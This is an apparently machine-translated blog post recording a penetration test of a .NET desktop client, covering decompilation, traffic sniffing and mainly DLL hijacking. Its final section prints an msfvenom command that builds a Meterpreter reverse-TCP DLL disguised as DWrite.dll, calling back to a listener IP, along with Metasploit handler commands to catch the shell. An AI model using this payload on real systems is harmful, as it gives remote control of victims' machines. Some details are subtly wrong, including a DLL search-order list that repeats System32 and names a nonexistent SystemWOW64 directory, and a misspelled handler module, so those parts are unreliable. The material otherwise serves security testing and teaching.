banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

Recording a fat client program penetration test.

#渗透测试602
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The article discusses the difference between "fat" and "thin" client applications, with fat clients being based on C/S architecture and thin clients being based on B/S architecture. It also explores the vulnerability of DLL hijacking, which involves replacing a legitimate DLL file with a malicious one, allowing attackers to execute remote commands, steal sensitive information, and compromise system integrity. The article provides steps for identifying and exploiting DLL hijacking vulnerabilities, including using tools like Sysinternals Suite and Metasploit framework.

A fat client is an application in the client-server architecture, where the client executes a portion of the application logic and the server provides storage and computing support. The client and server communicate and interact with each other through a network. On the other hand, a "thin client" is an application based on the browser-server architecture, where the application runs on a browser.

When you receive a fat client program, you can first check what architecture it is based on. Usually, programs with .exe extensions are compiled using C, C#, or .NET.

You can use CFF Explorer to check the architecture of the target program, as shown in the image below.

[Image: CFF Explorer screenshot]

From the screenshot, you can see that it is a 32-bit program compiled using Microsoft Visual Studio .NET, and it is a .NET program.

For .NET programs like this, you can use dnSpy (GitHub - dnSpy/dnSpy: .NET debugger and assembly editor). dnSpy is a famous .NET decompiler that can decompile .NET compiled files, including executable files (exe), DLL files, and .NET assemblies. By decompiling the exe file using dnSpy, you can easily view its source code and internal structure, helping you understand and analyze the program's execution mechanism.

[Image: dnSpy screenshot]

From the decompiled code, you can see SQL queries. Here, you can see that the SQL queries are not filtered and directly concatenated, but single quotes are added, resulting in an extra single quote in each query, making it impossible to bypass.

However, if the client program can be directly decompiled, then if the client program is not signed, it can be recompiled and packaged into another program. The consequence is that it can forge the official client and write malicious files into it, enabling phishing attacks and other malicious activities.

To analyze the traffic during transmission, you can use tools like Wireshark or Fiddler to check if any sensitive information is leaked.

[Image: Wireshark screenshot]

From the screenshot, you can see that this fat client uses the TDS database protocol, including the IP address and port of the nodes.

[Image: Wireshark screenshot]

It also leaks SQL queries during transmission.

In addition to tools like Wireshark and Fiddler, Echo Mirage can also be used for traffic analysis. You can download and use it.

Now, let's get back to the main topic of this article, DLL hijacking vulnerability. Since it is a fat client application, it loads various DLL files.

DLL hijacking is an attack technique that takes advantage of the system's incorrect or defective search order when loading dynamic-link libraries (DLLs). It replaces a legitimate file with a malicious file during the search for available DLL files, causing the system to load and execute the controlled DLL file, achieving the attacker's goals.

DLL hijacking attacks can cause significant harm and can be used for various malicious activities, such as:

  1. Stealing sensitive information: Malicious DLL files may steal sensitive information such as login credentials.
  2. Executing remote commands: By hijacking DLL files, attackers can remotely control a user's computer to execute malicious commands, such as downloading and installing other malicious programs.
  3. Disrupting system integrity and stability: Hijacked DLL files can compromise system security, integrity, and stability, such as modifying system settings or damaging system files.

The first step in DLL hijacking is to obtain usable DLL files.

To do this, you can use the Sysinternals Suite, specifically the Procmon Monitor tool, to view the processes related to the currently running programs.

[Image: Procmon Monitor screenshot]

After loading, you can see the names, PIDs, paths, and other information of various running processes. You can filter specific program processes by pressing Ctrl+L.

If the target program loads configuration files, you can also view them using this tool.

Since it is DLL hijacking, we need to find usable DLL files.

In the target program's directory, I found a DWrite.dll file. This file is part of the Windows operating system and is the Dynamic-Link Library file for the DirectWrite API. DirectWrite is an API used for rendering text and fonts, providing higher quality and clearer text rendering effects using hardware acceleration and advanced font rendering techniques.

In Windows, many applications (such as Adobe Creative Suite) use DirectWrite technology for text and font rendering, so the dwrite.dll file is called and used in many applications.

You can search for processes with "NAME NOT FOUND" to find DLL files.

Finding DLL files may require trying several files, and in addition to finding the DLL file, you also need to understand the loading order of DLL files in Windows.

  1. Search in the application's directory.
  2. Windows system directory (e.g., C:\Windows\System32).
  3. Common Windows directories (C:\Windows\System32 and C:\Windows).
  4. Search in the Windows system directory for the Administrator type (e.g., C:\Windows\SystemWOW64).
  5. Search in all directories specified in the PATH environment variable.
  6. Current working directory.

The operating system searches for DLL files in the specified directories and files according to the above order and loads them into the application.

Once you understand the DLL loading order and find the DLL file, you can start constructing a malicious DLL file using the Metasploit framework.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.100 LPORT=4444 -a x86 --platform Windows -f dll > DWrite.dll

# LHOST=192.168.100.100, replace it with your listening IP

Copy the DLL file to the client's directory, start the listener on your VPS using Metasploit, and then launch the client's exe program. It should successfully return a shell.

msf6> use exploit/multi/handle
msf6> set payload windows/meterpreter/reverse_tcp
msf6> set lhost 192.168.100.100
msf6> set lport 4444
msf6> exploit

You will directly get a system shell of the client running the target program.

I wrote this article because I came across an article about DLL hijacking (https://xz.aliyun.com/t/12376), which reminded me of the DLL vulnerability I encountered before. I decided to record it here.

Image source

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.